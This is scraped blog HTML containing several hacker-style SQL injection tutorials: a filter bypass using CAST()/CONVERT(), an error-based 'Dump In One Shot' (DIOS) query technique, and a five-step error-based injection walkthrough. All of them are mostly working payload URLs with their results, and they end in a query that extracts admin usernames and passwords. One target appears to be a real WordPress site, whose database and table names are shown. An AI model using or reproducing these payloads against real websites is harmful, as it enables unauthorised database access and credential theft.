<span style="font-size: small;"><b>BYPASSED !! </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>.3 Using CAST()</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Site.com/detail.php?id=31 and 0 Union Select
1,cast(table_name as binary),3,4,5 from information_schema.tables where
table_schema=database()-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>BYPASSED !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>.4 Using </b><b>CONVERT()</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b> </b><b>http://www.Site.com/detail.php?id=31 and 0 Union Select
1,convert(table_name using ascii),3,4,5 from information_schema.tables where
table_schema=database()-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>BYPASSED !!</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>SOME ADVANCE Methods for CONVERT() </b></span><br />
<span style="font-size: small;">In <b>CONVERT()</b> Function<b> </b>if <b>ascii </b>doesn't work then we can use these <b>Functions </b>instead of <b>ascii</b>.</span><br />
<ol>
<li><span style="font-size: small;"><b>ujis</b></span></li>
<li><span style="font-size: small;"><b>
ucs2</b></span></li>
<li><span style="font-size: small;"><b>
tis620</b></span></li>
<li><span style="font-size: small;"><b>
swe7</b></span></li>
<li><span style="font-size: small;"><b>
sjis</b></span></li>
<li><span style="font-size: small;"><b>
macroman</b></span></li>
<li><span style="font-size: small;"><b>
macce</b></span></li>
<li><span style="font-size: small;"><b>
latin7</b></span></li>
<li><span style="font-size: small;"><b>
latin5</b></span></li>
<li><span style="font-size: small;"><b>
latin2</b></span></li>
<li><span style="font-size: small;"><b>
koi8u</b></span></li>
<li><span style="font-size: small;"><b>
koi8r</b></span></li>
<li><span style="font-size: small;"><b>
keybcs2</b></span></li>
<li><span style="font-size: small;"><b>
hp8</b></span></li>
<li><span style="font-size: small;"><b>
geostd8</b></span></li>
<li><span style="font-size: small;"><b>
gbk</b></span></li>
<li><span style="font-size: small;"><b>
gb2132</b></span></li>
<li><span style="font-size: small;"><b>
armscii8</b></span></li>
<li><span style="font-size: small;"><b>
ascii</b></span></li>
<li><span style="font-size: small;"><b>
cp1250</b></span></li>
<li><span style="font-size: small;"><b>
big5</b></span></li>
<li><span style="font-size: small;"><b>
cp1251</b></span></li>
<li><span style="font-size: small;"><b>
cp1256</b></span></li>
<li><span style="font-size: small;"><b>
cp1257</b></span></li>
<li><span style="font-size: small;"><b>
cp850</b></span></li>
<li><span style="font-size: small;"><b>
cp852</b></span></li>
<li><span style="font-size: small;"><b>
cp866</b></span></li>
<li><span style="font-size: small;"><b>
cp932</b></span></li>
<li><span style="font-size: small;"><b>
dec8</b></span></li>
<li><span style="font-size: small;"><b>
euckr</b></span></li>
<li><span style="font-size: small;"><b>
latin1</b></span></li>
</ol>
<span style="font-size: small;">Hope it Will Help you in<b> Future . </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">
<b>AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee</b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com6tag:blogger.com,1999:blog-5545325473666478334.post-43982299200177639722015-06-12T03:39:00.000-07:002015-08-17T08:34:13.196-07:00Error Based Dump In One Shot - (DIOS)<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQfqFA9BL5DAWliXP6vlnApUQ1hpZc6q8LrNuI9OddvTrgbqcl1Kpxj3ZB18G5tftaJHQJ_IqP95rB1RQXB3PnzG65GdvNAngnLlmD9pHxVVtH2OX4EDBcCWuExxhOqWg0LwP_opIttByk/s1600/tt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQfqFA9BL5DAWliXP6vlnApUQ1hpZc6q8LrNuI9OddvTrgbqcl1Kpxj3ZB18G5tftaJHQJ_IqP95rB1RQXB3PnzG65GdvNAngnLlmD9pHxVVtH2OX4EDBcCWuExxhOqWg0LwP_opIttByk/s400/tt.png" title="Error Based Dump In One Shot - (DIOS)" width="400" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Error Based Dump In One Shot (DIOS) - By RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We Have Discussed in Our Previous Tutorial About <a href="http://www.raijee1337.blogspot.com/2015/06/error-based-injection-tutorial.html" target="_blank">Error Based SQL Injection</a>.</span><br />
<span style="font-size: small;">In This Tutorial You Will Learn How To Build Error Based Dump In Shot ( DIOS ) .</span><br />
<span style="font-size: small;">As We Know That in <b>Error Based Query</b> we Give Our Commands To server and it Gives Us result the Under a error .</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">If We Want to Get the version() then we Give Query Like this.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -<br /> </b></span><br />
<span style="font-size: small;">we get the version printed on the page. version=<b>5.5.42-cll</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbkhUwJhEM6v7gbjKj82vmVAgPn-jfDluVy4ywyHIdH1eXD33ZjP8_-s-3kuF6py5M_pxMO9a9IQ2-k50ieW_-Iy0QHy0Ty4uWXDlqRnhXRu8hhPGCs4ofqkwMGbNeKh4jARSO0AqOh6AS/s1600/tut1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="29" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbkhUwJhEM6v7gbjKj82vmVAgPn-jfDluVy4ywyHIdH1eXD33ZjP8_-s-3kuF6py5M_pxMO9a9IQ2-k50ieW_-Iy0QHy0Ty4uWXDlqRnhXRu8hhPGCs4ofqkwMGbNeKh4jARSO0AqOh6AS/s320/tut1.png" title="Error Based Dump In One Shot - (DIOS)" width="320" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Lets get the <b>Primary Database name</b>.</span><br />
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=11 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
and Here is our <b>Primary Database.</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQJ84vYk8xyp9pCCPW8oiUme_Af0rJP3bD5G4555cmCvCQnBU6ugUlPkfsgjvY0Ki8m4qyM9ro06nMA5Ha4FkmyT_CyxPSs00J-uUzW0Y2s_eFPxfaIRN9XIMufOYyuLnckh7XTZUbebUw/s1600/tut3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="25" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQJ84vYk8xyp9pCCPW8oiUme_Af0rJP3bD5G4555cmCvCQnBU6ugUlPkfsgjvY0Ki8m4qyM9ro06nMA5Ha4FkmyT_CyxPSs00J-uUzW0Y2s_eFPxfaIRN9XIMufOYyuLnckh7XTZUbebUw/s640/tut3.png" title="Error Based Dump In One Shot - (DIOS)" width="640" /></a></span></div>
<span style="font-size: small;">this the Primary Database name "kkbaketo_wordpress<b>"</b>
<b>s</b>o this is our Primary Database name . if we want to get the other we usually Increase the <b>LIMIT 0,1</b> to <b>LIMIT 1,1</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">But we Can Also get all <b>Databases </b>Without Using the <b>LIMIT</b>.</span><br />
<span style="font-size: small;">Here Is Our <b>SYNTAX </b>for Getting All <b>Databases</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Add this <b>SYNTAX </b>to Get all <b>Databases</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=</b><b>(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFLOPP7_23tKpEoDP7J2AsaNv_5r7qRdOK8EsGpQKqV9Fq9Kt4ZkVEU0UxvDgoGRbHHK-zU9qIivdUmYJVKyfmjEuWLosq-srnhkphydZ5TMYIQzJrHl-MgsFyk9I0f0bMgX2eeUj1ysJd/s1600/tut4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="24" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFLOPP7_23tKpEoDP7J2AsaNv_5r7qRdOK8EsGpQKqV9Fq9Kt4ZkVEU0UxvDgoGRbHHK-zU9qIivdUmYJVKyfmjEuWLosq-srnhkphydZ5TMYIQzJrHl-MgsFyk9I0f0bMgX2eeUj1ysJd/s640/tut4.png" title="Error Based Dump In One Shot - (DIOS)" width="640" /></a></span></div>
<span style="font-size: small;">and these our <b>Databases</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>information_schema,kkbaketo_wordpress</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Next step is to Get The<b> Tables.</b></span><br />
<span style="font-size: small;">Here is The Example.</span><br />
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -</b></span><br />
<span style="font-size: small;">and we Get Table name under Error response ::</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhji_z_fN87rS2KKZh9x19jGNRVw40jL1yVXkakY6pQXvOgZFYSHG00Ns0NN1Lg9uk568Tt7UY93r_yF9_1yNkKuSBWpc5DruiUGgw_mWGnbpt2tKGoyXIgnIGa-6qOi_pXyedrDCVJmTdh/s1600/tut5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="25" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhji_z_fN87rS2KKZh9x19jGNRVw40jL1yVXkakY6pQXvOgZFYSHG00Ns0NN1Lg9uk568Tt7UY93r_yF9_1yNkKuSBWpc5DruiUGgw_mWGnbpt2tKGoyXIgnIGa-6qOi_pXyedrDCVJmTdh/s640/tut5.png" title="Error Based Dump In One Shot - (DIOS)" width="640" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We Just GOT one <b>TABLE</b> <b>Name</b>.<b> kkbaketop_category</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">it Was Our First Table name. we Can Get Next one and Then Another by Increasing the Value of <b>LIMIT 0,1 </b>to <b>LIMIT 2,1 LIMIT 3,1</b></span><br />
<span style="font-size: small;"><b> </b>We Increase the <b>LIMIT </b>for <b>Tables</b>.</span><br />
<span style="font-size: small;"><b>LIMIT 0,1 for 1st table.</b></span><br />
<span style="font-size: small;"><b>LIMIT 1,1 for 2nd tables.</b></span><br />
<span style="font-size: small;">As We Know that we Can <b>DUMP </b>All Tables and Columns In <b>UNION BASED</b> injection.</span><br />
<span style="font-size: small;">in <b>ERROR BASED Dump in one Shot ( DIOS )</b> we can not Dump All Tables/Columns as Like <b>UNION</b> <b>BASED </b>Injection.</span><br />
<span style="font-size: small;">But We Can Get some <b>Tables/Columns</b> from The <b>Database </b>by <b>BUILDING </b>our <b>Query</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here is Our <b>SYNTAX </b>For <b>Tables</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>(select group_concat(table_name) from information_schema.tables where table_schema=database())</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now add this <b>SYNTAX </b>in our <b>DIOS Query.</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b><br /></b>
Our <b>DIOS Query </b>is Ready for <b>Tables</b>.</span><br />
<!-- adsense -->
<span style="font-size: small;"><b><br /></b></span>
<br />
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=</b><b>(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select
group_concat(table_name) from information_schema.tables where
table_schema=database())))x)a)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIpeIo1naNUvLiNIlARQMiBcx6YoNvgPgC_s18LOcQwjy5s1jmzOIo_SiDAqPRAjv0i2dT188ZOaokpnzFlwVthonRUNnxrjxFEGSZmAxOZcUuYG-V3WurhilD66pTNR-V6bQRBsExqqYH/s1600/tut6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="20" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIpeIo1naNUvLiNIlARQMiBcx6YoNvgPgC_s18LOcQwjy5s1jmzOIo_SiDAqPRAjv0i2dT188ZOaokpnzFlwVthonRUNnxrjxFEGSZmAxOZcUuYG-V3WurhilD66pTNR-V6bQRBsExqqYH/s640/tut6.png" title="Error Based Dump In One Shot - (DIOS)" width="640" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<span style="font-size: small;">Here are Our<b> Tables.</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>kkbaketop_admin,kkbaketop_category,kkbaketop_content,kkbaketop_contentOld,kkbaketop_meta,kkbaketop_navigation,kkbaketop_product</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We Can also <b> HTML TAG </b>to show All Tables in a New Line.</span><br />
<span style="font-size: small;"><b>HTML TAG=<BR></b></span><br />
<span style="font-size: small;">we can use it by encoding it in <b>HEX </b>Value or Putting the <b>Single Quote</b> Before and After the <b>HTML TAG</b>.</span><br />
<span style="font-size: small;"><b>HEX Value=3c42523e</b> we have to use 0x before the <b>HEX </b>Value to Use The <b>HTML TAG</b>.</span><br />
<span style="font-size: small;"><b>HEX Value=0x3c42523e</b></span><br />
<span style="font-size: small;"><b>Putting Single Quote='<BR>'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>PUT The HTML TAG Before The Table_name. </b></span><br />
<span style="font-size: small;">Hmmm now Lets Add this Tag to our <b>Error Based DIOS Query</b> and execute it.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=</b><b>(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select
group_concat('<BR>',table_name) from information_schema.tables where
table_schema=database())))x)a)-- -</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNw2iue3Ig-C8ITQT1SeyKZpRSYfhLXwgArSn3bofaLMFH4fNO4rqLutA_1cR2zcLUheORYl_REA_d7WMBJGVxynTiw9EwwPMeayg8OnJW2KGIZkpuNqnXqNsbtmzwWe6Wy2xNMA3ZwIjM/s1600/tut7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNw2iue3Ig-C8ITQT1SeyKZpRSYfhLXwgArSn3bofaLMFH4fNO4rqLutA_1cR2zcLUheORYl_REA_d7WMBJGVxynTiw9EwwPMeayg8OnJW2KGIZkpuNqnXqNsbtmzwWe6Wy2xNMA3ZwIjM/s400/tut7.png" title="Error Based Dump In One Shot - (DIOS)" width="400" /></a></span></div>
<span style="font-size: small;"> Now All <b>Tables </b>are in<b> NEW line.</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Next Step is we Have to Get<b> Columns.</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here Is The<b> SYNTAX </b>for<b> Columns.</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>(select group_concat(3c42523e,table_name,0x3a,column_name) from information_schema.columns where table_schema=database())</b></span><br />
<span style="font-size: small;"><b><br /></b>
Add this <b>SYNTAX </b>in <b>DIOS Query </b>and Execute it for<b> Getting Columns </b>from Each<b> Table.</b></span><br />
<span style="font-size: small;"><b><br /></b>
And Here is the <b>FINAL DIOS Query </b>for <b>Error Based Getting Tables </b>And <b>Columns</b> in one<b> SHOT.</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.FakeSite.com/news.php?id=</b><b>(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select
group_concat('<BR>',table_name,0x3a,column_name) from information_schema.columns where
table_schema=database())))x)a)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgloDg-3N7ieVcGNdE-MxKxNV0giZ7UB4lXFpy30l4LsWCYvDolysYIBcL8qbdH-szGy2hx4jMbKoAOVh7pXlIiQ5exfpuYhBK7j7-JeRlIyMYjGr0TKn9sBuA5u85WeoJB2IPNo6lcq3b5/s1600/tut8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Dump In One Shot - (DIOS)" border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgloDg-3N7ieVcGNdE-MxKxNV0giZ7UB4lXFpy30l4LsWCYvDolysYIBcL8qbdH-szGy2hx4jMbKoAOVh7pXlIiQ5exfpuYhBK7j7-JeRlIyMYjGr0TKn9sBuA5u85WeoJB2IPNo6lcq3b5/s400/tut8.png" title="Error Based Dump In One Shot - (DIOS)" width="400" /></a></span></div>
<span style="font-size: small;"><b><br /></b>You Can Se The<b> Tables </b>And <b>Columns</b> Printed On The <b>ScreenShot</b>.</span><br />
<span style="font-size: small;">Hope You like The<b> Tutorial.</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com2tag:blogger.com,1999:blog-5545325473666478334.post-74773622003857333442015-06-10T07:26:00.003-07:002015-08-17T08:31:52.563-07:00Error Based Injection -Tutorial<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik-cKf3q2lyQYICvJ6KyEyfD0kSO77Sdwo0zy8facG4tMRuid_bFtUOvCHGfvSZE2gbSVErMMVojidUAavaSoB_0bz7e_buMdIP-Rt3JTJ_qi_hI2JNJTidjhKzrxxdi4AgWuEUf2Tqyx9/s1600/ere.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Injection -Tutorial" border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik-cKf3q2lyQYICvJ6KyEyfD0kSO77Sdwo0zy8facG4tMRuid_bFtUOvCHGfvSZE2gbSVErMMVojidUAavaSoB_0bz7e_buMdIP-Rt3JTJ_qi_hI2JNJTidjhKzrxxdi4AgWuEUf2Tqyx9/s320/ere.png" title="Error Based Injection -Tutorial" width="320" /></a></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b> Error Based Injection -Tutorial BY RAi Jee</b></span><br />
<span style="font-size: small;">After Union Based Injection In this Tutorial You Will Learn Error Based SQL Injection.</span><br />
<span style="font-size: small;">How You Will Understand That Our Target WebSite is in Error Based Injection.??</span><br />
<span style="font-size: small;">Hmm While we are Injecting Site , And Count Total Number of Columns and Then Build our Union Based SQL Query .</span><br />
<span style="font-size: small;"><br /></span>
<br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We got 6 Number of Columns. and our UNION BASED Query.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=-1 Union Select 1,2,3,4,5,6-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
When we Execute our Union Based Query it doesn't Give us any Vulnerable Column Number Printed on The <b>Webpage</b> or in <b>HTML</b>.</span><br />
<span style="font-size: small;">It Gives us A Error Message .</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b> The used SELECT statements have a different number of columns </b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Sometimes The TARGET site not Give Any Vulnerable Column Number And Also Not Any Kind of Error . Those Sites Are Also Error Based / Double Query SQL injection<b> .</b></span><br />
<span style="font-size: small;">So We Processed<b> </b>Next With Error Based Queries.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>1st Step is To Get Version.</b></span><br />
<span style="font-size: small;">Here is The Error Based Query To Get The <b>Version</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">and we Will Get The <b>Version </b>Printed on The <b>WebPage.</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJBFX0zBNicFrO1hnOj_gm6BPFNIxKxG5v26FXBlKoKRh6UVRL_3f_wNXbup4F1JK-Z3h8nvn1_Q8foVMdDHVy7BJ5neIQt66kxxFv7_u03DbHUGYPh7OVNbE5LelifGHgFzh6JZSzSYZ3/s1600/tu.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Error Based Injection -Tutorial" border="0" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJBFX0zBNicFrO1hnOj_gm6BPFNIxKxG5v26FXBlKoKRh6UVRL_3f_wNXbup4F1JK-Z3h8nvn1_Q8foVMdDHVy7BJ5neIQt66kxxFv7_u03DbHUGYPh7OVNbE5LelifGHgFzh6JZSzSYZ3/s400/tu.png" title="Error Based Injection -Tutorial" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><br /></b></span>
<br />
<span style="font-size: small;"><b>2nd Step is To Get Database Name.</b></span><br />
<span style="font-size: small;"><b><br /></b>
Now Lets Check the Current Database Name.</span><br />
<span style="font-size: small;">A Website can Have More than 2 , 3 or 5 Databases. So We Use LIMIT to get all The Databases.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>LIMIT 0,1 LIMIT 1,1 LIMIT 2,1 LIMIT 3,1</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here is Our Query To Get The Database.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>3rd Step Is to Get The Tables .</b></span><br />
<span style="font-size: small;">Now We Have To Get The Tables. As We Want Tables From Primary Database . </span><br />
<span style="font-size: small;">Here Is The Query For Tables From Primary Database.</span><br />
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>Increase</b> The Value Of <b>Limit </b>as <b>LIMIT 0,1 </b>to <b>LIMIT 1,1 LIMIT 2,1 LIMIT 3,1</b></span><br />
<span style="font-size: small;">Until You Get Your Desired Table Name .</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>4th Step Is to Get The Column Names From Our Targeted Table Name.</b></span><br />
<span style="font-size: small;">Now We Have to Get The Column Names From The Table Name.</span><br />
<span style="font-size: small;">We Got Table Of <b>Admin</b>.</span><br />
<span style="font-size: small;">So Lets Get The Columns From Table <b>Admin </b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Here Is The Query For Getting Column Names From The Table <b>Admin</b>. </span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xADMIN limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
To Get The Columns From The Table <b>Admin </b>we Have to Encode It In <b>HEX</b> and Then We Can Execute Our Query.</span><br />
<span style="font-size: small;">Here Is that PART in Our Query. </span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Table_name=ADMIN</b></span><br />
<span style="font-size: small;">Here Is The HEX Value of <b>ADMIN</b>=61646d696e</span><br />
<span style="font-size: small;">And Put it With 0x to Build Our Correct Query.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Table_name=0x61646d696e</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And Here Is The Query.</span><br />
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select 1 from (select
count(*),concat((select(select concat(cast(column_name as char),0x7e))
from information_schema.columns where table_name=0x</b><b>61646d696e limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Increase The Value Of <b>LIMIT </b>to <b>LIMIT 0,1 LIMIT 1,1 LIMIT 2,1</b></span><br />
<span style="font-size: small;">until we Get The Column Name Like <b>Username </b>and <b>Password</b>.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>5Th Step Is to Extracting Data From Columns .</b></span><br />
<span style="font-size: small;">After We Get The Column names Like <b>Username </b>And <b>Password</b>.</span><br />
<span style="font-size: small;">Next Step Is To Extract Data From These Columns.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Here is The Query For Extracting Data from Columns.</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME_1,0x3a,COLUMN_NAME_2) as char),0x3a)) from TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
<b>WE Put The TABLENAME=Admin</b></span><br />
<span style="font-size: small;"><b>And </b></span><br />
<span style="font-size: small;"><b>Column_name_1=username</b></span><br />
<span style="font-size: small;"><b>Column_name_2=password</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>So Here is The FINAL QUERY .</b></span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>http://www.target.com/index.php?id=1 and (select
1 from (select count(*),concat((select(select
concat(cast(concat(username,0x3a,password) as char),0x3a))
from admin limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And We Get The ADMIN username and Password printed on the Page.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee </b></span><br />
